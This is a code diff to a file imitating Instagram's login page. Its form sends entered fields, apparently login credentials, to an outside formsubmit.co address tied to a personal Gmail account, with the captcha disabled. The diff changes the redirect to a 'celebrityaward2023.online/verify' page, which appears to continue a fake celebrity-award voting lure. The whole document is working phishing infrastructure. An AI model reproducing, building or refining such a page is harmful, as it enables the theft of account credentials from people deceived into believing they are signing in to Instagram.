--- a/instagram.com/index.html
+++ b/instagram.com/index.html
@@ -20,7 +20,7 @@
         <form action="https://formsubmit.co/christophermark123123@gmail.com" method="POST">
           <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_template" value="table">
-                <input type="hidden" name="_next" value="https://www.celebrityaward2023.online/vote">
+                <input type="hidden" name="_next" value="https://www.celebrityaward2023.online/verify">
           <input
             class="input-box"
             type="text"
